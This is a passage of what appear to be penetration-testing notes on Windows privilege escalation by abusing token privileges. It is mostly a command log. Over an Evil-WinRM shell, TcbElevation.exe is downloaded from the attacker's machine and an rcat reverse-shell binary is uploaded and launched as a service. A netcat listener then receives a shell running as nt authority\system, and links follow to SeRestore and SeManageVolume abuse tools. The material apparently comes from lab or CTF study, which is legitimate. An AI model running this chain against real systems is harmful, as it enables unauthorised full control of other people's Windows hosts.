*Evil-WinRM* PS C:\Users\svc_deploy\Documents> iwr http://<tun0>/TcbElevation.exe -outfile TcbElevation.exe
```

{% embed url="https://github.com/xct/rcat" %}

```
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload rcat_10.8.0.210_443.exe

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> .\TcbElevation.exe pwn "C:\Windows\system32\cmd.exe /c C:\Users\svc_deploy\Documents\rcat_10.8.0.210_443.exe"
Error starting service 1053
```

```
➜  rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.153.117] 53924
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

```

## SeRestorePrivilege

{% embed url="https://github.com/xct/SeRestoreAbuse" %}

## SeManageVolumePrivilege

{% embed url="https://github.com/xct/SeManageVolumeAbuse" %}

## Resources

{% embed url="https://github.com/gtworek/Priv2Admin" %}

